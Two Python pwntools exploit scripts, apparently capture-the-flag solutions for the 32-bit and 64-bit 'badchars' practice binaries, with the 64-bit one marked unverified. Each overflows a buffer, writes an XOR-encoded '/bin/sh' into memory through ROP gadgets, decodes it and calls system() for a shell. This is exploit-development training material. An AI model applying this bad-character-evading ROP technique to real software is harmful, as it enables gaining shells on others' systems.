32位
# -*- coding:UTF-8 -*-
from pwn import*
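# Script for the ./badchars32 binary: store an XOR-encoded "/bin/sh" string
# at date_addr using the author's pop/mov gadgets, decode it in place with
# the pop/xor gadgets, then call system() on it. Gadget semantics below are
# taken from the author's variable names, not verified against a disassembly.
p = process("./badchars32")

bin_sh = "/bin/sh\x00"
system_plt = 0x80484e0
date_addr = 0x804A038
# Single-byte XOR key. It is used both to encode bin_sh here and as the cl
# value in the decode rounds below, so it lives in exactly one place.
XOR_KEY = 2

# Gadget addresses, as labelled by the author (pop esi; pop edi / mov [edi], esi /
# pop ebx; pop ecx / xor [ebx], cl).
pop_esi_edi_addr = 0x8048899
mov_edi_esi_addr = 0x8048893
pop_ebx_ecx_addr = 0x8048896
xor_ebx_cl_addr = 0x8048890

# Encode: XOR every byte of bin_sh with XOR_KEY (8 bytes in total).
xornum = "".join(chr(ord(c) ^ XOR_KEY) for c in bin_sh)

# Write phase. A 32-bit register carries 4 bytes, so the 8-byte string is
# stored in two pop/mov rounds, at date_addr and date_addr + 4.
chain = ['A' * 0x2c]
for offset in (0, 4):
    chain.append(p32(pop_esi_edi_addr))
    chain.append(xornum[offset:offset + 4])
    chain.append(p32(date_addr + offset))
    chain.append(p32(mov_edi_esi_addr))

# Decode phase: one pop/xor round per stored byte, restoring bin_sh in place.
for x in range(len(xornum)):
    chain.append(p32(pop_ebx_ecx_addr))
    chain.append(p32(date_addr + x))
    chain.append(p32(XOR_KEY))
    chain.append(p32(xor_ebx_cl_addr))

# Final call: system_plt, a dummy return address, then the decoded string
# address as the first argument (cdecl layout).
chain.append(p32(system_plt))
chain.append(p32(0))
chain.append(p32(date_addr))
payload = "".join(chain)

p.recvuntil('>')
p.sendline(payload)
p.interactive()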
64位（待检验）
# -*- coding:UTF-8 -*-
from pwn import*
#context.log_level = 'debug'
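# 64-bit variant for the ./badchars binary, same idea as the 32-bit script:
# store an XOR-encoded "/bin/sh" at bss_addr with the pop/mov gadgets, decode
# it byte by byte with the pop/xor gadgets, then call system() on it.
# NOTE: the author marks this variant as unverified ("待检验"). Gadget
# semantics are taken from the author's variable names.
p = process("./badchars")

bss_addr = 0x601080
# Gadget addresses, as labelled by the author.
pop_r12_r13_addr = 0x400b3b
mov_r13_r12_addr = 0x400b34
pop_r14_r15_addr = 0x400b40
xor_r15_r14_addr = 0x400b30
pop_rdi_addr = 0x400b39
system_plt_addr = 0x4006f0
bin_sh = "/bin/sh\x00"
# Single-byte XOR key, shared by the encode loop and the decode rounds.
XOR_KEY = 1

# Encode: XOR every byte of bin_sh with XOR_KEY (8 bytes in total).
xornum = "".join(chr(ord(c) ^ XOR_KEY) for c in bin_sh)

chain = ['A' * 0x28 + p64(0)]

# Write phase: a 64-bit register carries all 8 encoded bytes, so one
# pop/mov round suffices.
chain += [
    p64(pop_r12_r13_addr),
    xornum,
    p64(bss_addr),
    p64(mov_r13_r12_addr),
]

# Decode phase: one pop/xor round per stored byte, restoring bin_sh in place.
for x in range(len(xornum)):
    chain += [
        p64(pop_r14_r15_addr),
        p64(XOR_KEY),
        p64(bss_addr + x),
        p64(xor_r15_r14_addr),
    ]

# Final call: pop rdi <- bss_addr, then system_plt.
chain += [p64(pop_rdi_addr), p64(bss_addr), p64(system_plt_addr)]
payload = "".join(chain)

# NOTE(review): unlike the 32-bit script, no prompt is consumed before
# sending; confirm against the binary's actual output.
p.sendline(payload)
p.interactive()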